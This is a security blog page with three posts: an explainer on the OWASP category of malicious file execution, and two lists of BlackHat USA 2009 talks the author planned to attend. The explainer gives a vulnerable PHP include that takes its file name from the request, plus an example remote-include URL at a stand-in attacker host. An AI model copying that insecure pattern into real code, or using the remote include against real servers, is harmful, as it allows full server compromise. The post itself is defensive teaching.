Miscellaneous Security

Reading time: 2 – 4 minutes

Photo: TCM Hitchhiker

This is the third-part in a ten-part-series describing the OWASP Top 10. (See all the OWASP Top 10)

What is Malicious File Execution

Some web applications allow the user to specify input that is used directly into file streams or allows the user to upload files to the server. At a later time the web application accesses the user supplied input in the web applications context. By doing this, the web application is allowing the potential for malicious file execution.

When an application allows user to modify file streams, the application is trusting the user to operate within certain “rules” and may assume the user won’t break these rules.

If there aren’t preventions in place, an attacker can exploit the rules by attempting to include files stored on remote or local file systems.

Web applications that are vulnerable to malicious file execution break the simple security rule of trusting user input.

Allowing malicious file execution to exist in a web application can lead to the complete compromise of the server.

Examples of Malicious File Execution

Typical examples of malicious file execution are remote file includes and local file includes. Most people think of these as PHP functions, however, that does not mean an ASP or JSP server isn’t susceptible to malicious file execution vulnerabilities.

Here is a common example, Imagine the PHP function:

include $_REQUEST['filename'];

An attacker can then specify a file name of a remote URL that they control, say http://evilhacker.com/attack.php

How Do You Prevent Malicious File Execution

Malicious file execution needs to be prevented from the design stage. If the design stage of the web application has already been completed, then extra precaution needs to be taken.

Developers need to pay particular attention to code access security mechanisms to ensure that file names supplied by or influenced by the user do not allow security controls to be obviated.

Web applications should not allow users to insert input into a server-based resource. However, if the ability is needed, then developers need to be extra cautious about what input they accept. Developers should insure that file names supplied by the user do not allow security controls to be bypassed.

General preventions that can be taken include:

• Strongly Validating user input using an only “accept known good” input.
• Adding firewall rules that prevent web servers from making new connections to external websites will aid in preventing remote file include vulnerabilities.
• Implementing a sandbox to isolate applications from one another.

Depending on your environment, specific preventions can also be taken. For instance, with J2EE developers should ensure that the security manager is enabled and properly configured. More information about specific environment preventions can be found at OWASP’s full article on malicious file execution.

Reading time: 4 – 6 minutes

Photo: Stephan Geyer

This is the second in a two-part-series on BlackHat USA 2009. (Part 1)

As we stepped into the taxi the driver asked us, “Where To?”

“Caesar’s Palace.” I said.

“What are you guys in town for?” He said to the four of us in back seat of his cab.

“BlackHat.”

“You guys are the hackers?!”

“Yes, We are ‘the’ hackers.”

“I talked to some of you last year. They told me  they could listen to my typing and blow up my computer! How are they able to do that?”

“They do that, using the Asparagus attack. As long as you don’t eat asparagus you will be fine.”

This is a conversation that a few of us had with a taxi driver last year while we were in Las Vegas attending BlackHat. If you happen to get this taxi driver. Please explain the Asparagus Attack. He was full of questions regarding how it is done.

We are now on to Day 2. The hangover should be maintainable enough to see the following talks:

Day 2 – Thursday – July 30th

[10:00am] Zane Lackey , Luis Miras 

Attacking SMS

[~10:30am] Kevin Stadmeyer , Garrett Held

Worst of the Best of the Best

[11:15am] Jeremiah Grossman , Trey Ford

Mo’ Money Mo’ Problems: Making A LOT More Money on the Web the Black Hat Way

[1:45pm] Haroon Meer , Nick Arvanitis , Marco Slaviero

Clobbering the Cloud!

[~2:15pm] Tony Flick 

Hacking the Smart Grid

[~3:45pm] Peter Guerra 

How Economics and Information Security Affects Cyber Crime and What It Means in the Context of a Global Recession

[4:45pm] Panel Discussion

A Black Hat Vulnerability Risk Assessment

Reading time: 3 – 5 minutes

Photo: Roadsidepictures

This is the first in a three-part-series on BlackHat USA 2009. (part 2)

A dark cloud is about to approach Las Vegas. The city of sin will soon get cold sweats at night when they realize what is approaching. At the end of July, Las Vegas will be pounced upon by hundreds of security professionals at the annual BlackHat convention.

BlackHat is the most well known computer and Internet security conference in the world. I always have a hard time deciding what talks to go see. I typically end up flagging way too many talks, and get burned out rather quickly. In addition, there are the security booze-hounds/gamblers that are very persuading in swaying you away from the talks.

This year, I thought I would try something different. I am listing the talks I want to see on this blog in an attempt to make sure I show up to them. We will see if this happens.

Day 1 – Wednesday – July 29th

[10:00am] Rod Beckstrom

Beckstrom’s Law: A Model for Valuing Networks and Security

[11:15am] Nathan Hamiel , Shawn Moyer

Weaponizing the Web: More Attacks on User-Generated Content

[1:45pm] Nitesh Dhanjani

Recoverable Advanced Metering Infrastructure / Psychotronica

[3:15pm] Mark Dowd , Ryan Smith , David Dewey

The Language of Trust: Exploiting Trust Relationships in Active Content

[4:45pm] Thomas H. Ptacek , David Goldsmith , Jeremy Rauch

Hacking Capitalism ‘09: Vulnerabilities In Markets And Trading Platforms

[6:00pm] The Pwnie Awards